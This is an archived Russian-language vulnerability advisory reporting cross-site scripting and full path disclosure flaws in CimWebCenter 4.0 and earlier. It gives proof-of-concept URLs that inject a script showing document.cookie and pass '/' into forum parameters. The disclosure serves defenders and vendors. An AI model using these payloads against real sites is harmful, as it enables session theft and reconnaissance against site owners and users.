Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20823
HistoryNov 10, 2008 - 12:00 a.m.

Vulnerabilities in CimWebCenter

2008-11-1000:00:00
vulners.com
15

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting и Full path disclosure уязвимостях в системе
CimWebCenter.

XSS:

http://site/forum/?mid=28&do=show_mess&tid=26%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&mode=-1

http://site/forum/?mid=28&do=show_mess&tid=26&mode=-1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Full path disclosure:

http://site/forum/?mid=28&do=show_mess&tid=26&mode=/

http://site/forum/?mid=28&do=/&tid=26&mode=-1

http://site/forum/?mid=/&do=show_mess&tid=26&mode=-1

Уязвимы CimWebCenter 4.0 и предыдущие версии.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/2594/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua